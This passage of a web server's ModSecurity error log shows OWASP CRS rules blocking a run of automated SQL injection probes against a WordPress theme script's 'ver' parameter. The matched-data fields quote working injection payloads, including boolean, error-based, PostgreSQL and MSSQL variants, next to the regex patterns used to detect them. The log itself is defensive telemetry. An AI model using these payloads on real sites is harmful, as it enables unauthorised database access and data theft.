"/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 2448= found within ARGS:ver: 1.8.5.47%' AND 2448=4799 AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGNHug2jzbr_AlO3dz4AAAANU"] [Sun Jul 07 16:18:44.619863 2024] [:error] [pid 31926:tid 139722584184576] [client 141.98.81.37:37768] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 5469= found within ARGS:ver: 1.8.5.47%' AND 5469=5469 AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGNHug2jzbr_AlO3dz4QAAAMo"] [Sun Jul 07 16:18:44.921478 2024] [:error] [pid 31926:tid 139722542221056] [client 141.98.81.37:37770] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 5683= found within ARGS:ver: 1.8.5.47 AND 5683=6356-- UlAN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGNHug2jzbr_AlO3dz4gAAAM8"] [Sun Jul 07 16:18:45.239272 2024] [:error] [pid 30828:tid 139722600969984] [client 141.98.81.37:37772] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 5469= found within ARGS:ver: 1.8.5.47 AND 5469=5469-- OSIs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGNTbJWLg2ecbngu9JXgAAAIg"] [Sun Jul 07 16:18:45.868697 2024] [:error] [pid 30828:tid 139722550613760] [client 141.98.81.37:37774] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGNTbJWLg2ecbngu9JXwAAAI4"] [Sun Jul 07 16:18:47.219648 2024] [:error] [pid 30828:tid 139722617755392] [client 141.98.81.37:37776] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGNzbJWLg2ecbngu9JYAAAAIY"] [Sun Jul 07 16:18:47.474708 2024] [:error] [pid 30828:tid 139722634540800] [client 141.98.81.37:37778] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x71766a7671 found within ARGS:ver: 1.8.5.47) AND (SELECT 6633 FROM(SELECT COUNT(*),CONCAT(0x71766a7671,(SELECT (ELT(6633=6633,1))),0x71707a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (5003=5003"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGNzbJWLg2ecbngu9JYQAAAIQ"] [Sun Jul 07 16:18:47.781217 2024] [:error] [pid 30828:tid 139722508650240] [client 141.98.81.37:37780] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x71766a7671 found within ARGS:ver: 1.8.5.47 AND (SELECT 6633 FROM(SELECT COUNT(*),CONCAT(0x71766a7671,(SELECT (ELT(6633=6633,1))),0x71707a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGNzbJWLg2ecbngu9JYgAAAJM"] [Sun Jul 07 16:18:48.088932 2024] [:error] [pid 31926:tid 139722475079424] [client 141.98.81.37:37782] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x71766a7671 found within ARGS:ver: 1.8.5.47') AND (SELECT 6633 FROM(SELECT COUNT(*),CONCAT(0x71766a7671,(SELECT (ELT(6633=6633,1))),0x71707a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('qVIF'='qVIF"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGOHug2jzbr_AlO3dz4wAAANc"] [Sun Jul 07 16:18:49.150124 2024] [:error] [pid 30828:tid 139722533828352] [client 141.98.81.37:37784] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x71766a7671 found within ARGS:ver: 1.8.5.47' AND (SELECT 6633 FROM(SELECT COUNT(*),CONCAT(0x71766a7671,(SELECT (ELT(6633=6633,1))),0x71707a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'hrmw'='hrmw"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGOTbJWLg2ecbngu9JYwAAAJA"] [Sun Jul 07 16:18:50.451870 2024] [:error] [pid 30827:tid 139722475079424] [client 141.98.81.37:37786] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x71766a7671 found within ARGS:ver: 1.8.5.47%' AND (SELECT 6633 FROM(SELECT COUNT(*),CONCAT(0x71766a7671,(SELECT (ELT(6633=6633,1))),0x71707a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGOkGuaLybMBNkB61uDwAAAFc"] [Sun Jul 07 16:18:50.678316 2024] [:error] [pid 30827:tid 139722525435648] [client 141.98.81.37:37788] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x71766a7671 found within ARGS:ver: 1.8.5.47 AND (SELECT 6633 FROM(SELECT COUNT(*),CONCAT(0x71766a7671,(SELECT (ELT(6633=6633,1))),0x71707a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- pTRg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGOkGuaLybMBNkB61uEAAAAFE"] [Sun Jul 07 16:18:50.917150 2024] [:error] [pid 30828:tid 139722668111616] [client 141.98.81.37:37790] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47) AND 1543=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (1543=1543) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(122)||CHR(112)||CHR(113)) AS NUMERIC) AND (8393=8393"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGOjbJWLg2ecbngu9JZAAAAIA"] [Sun Jul 07 16:18:51.147481 2024] [:error] [pid 30828:tid 139722475079424] [client 141.98.81.37:37792] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47 AND 1543=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (1543=1543) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(122)||CHR(112)||CHR(113)) AS NUMERIC)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGOzbJWLg2ecbngu9JZQAAAJc"] [Sun Jul 07 16:18:52.051891 2024] [:error] [pid 31926:tid 139722559006464] [client 141.98.81.37:37794] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47') AND 1543=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (1543=1543) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(122)||CHR(112)||CHR(113)) AS NUMERIC) AND ('cIwg'='cIwg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGPHug2jzbr_AlO3dz5AAAAM0"] [Sun Jul 07 16:18:52.288421 2024] [:error] [pid 31926:tid 139722517042944] [client 141.98.81.37:37796] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47' AND 1543=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (1543=1543) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(122)||CHR(112)||CHR(113)) AS NUMERIC) AND 'KGBS'='KGBS"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGPHug2jzbr_AlO3dz5QAAANI"] [Sun Jul 07 16:18:52.533458 2024] [:error] [pid 31926:tid 139722609362688] [client 141.98.81.37:37798] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47%' AND 1543=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (1543=1543) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(122)||CHR(112)||CHR(113)) AS NUMERIC) AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGPHug2jzbr_AlO3dz5gAAAMc"] [Sun Jul 07 16:18:53.037872 2024] [:error] [pid 31926:tid 139722466686720] [client 141.98.81.37:37800] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47 AND 1543=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (1543=1543) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(122)||CHR(112)||CHR(113)) AS NUMERIC)-- mfYh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGPXug2jzbr_AlO3dz5wAAANg"] [Sun Jul 07 16:18:53.577343 2024] [:error] [pid 31926:tid 139722500257536] [client 141.98.81.37:37802] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: CONVERT( found within ARGS:ver: 1.8.5.47) AND 8359=CONVERT(INT,(SELECT CHAR(113) CHAR(118) CHAR(106) CHAR(118) CHAR(113) (SELECT (CASE WHEN (8359=8359) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(112) CHAR(122) CHAR(112) CHAR(113))) AND (3160=3160"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGPXug2jzbr_AlO3dz6AAAANQ"] [Sun Jul 07 16:18:54.037597 2024] [:error] [pid 31926:tid 139722651326208] [client 141.98.81.37:37804] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: CONVERT( found within ARGS:ver: 1.8.5.47 AND 8359=CONVERT(INT,(SELECT CHAR(113) CHAR(118) CHAR(106) CHAR(118) CHAR(113) (SELECT (CASE WHEN (8359=8359) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(112) CHAR(122) CHAR(112) CHAR(113)))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGPnug2jzbr_AlO3dz6QAAAMI"] [Sun Jul 07 16:18:54.307742 2024] [:error] [pid 30827:tid 139722559006464] [client 141.98.81.37:37806] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: CONVERT( found within ARGS:ver: 1.8.5.47') AND 8359=CONVERT(INT,(SELECT CHAR(113) CHAR(118) CHAR(106) CHAR(118) CHAR(113) (SELECT (CASE WHEN (8359=8359) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(112) CHAR(122) CHAR(112) CHAR(113))) AND ('dISM'='dISM"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGPkGuaLybMBNkB61uEQAAAE0"] [Sun Jul 07 16:18:54.704299 2024] [:error] [pid 30828:tid 139722626148096] [client 141.98.81.37:37808] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file 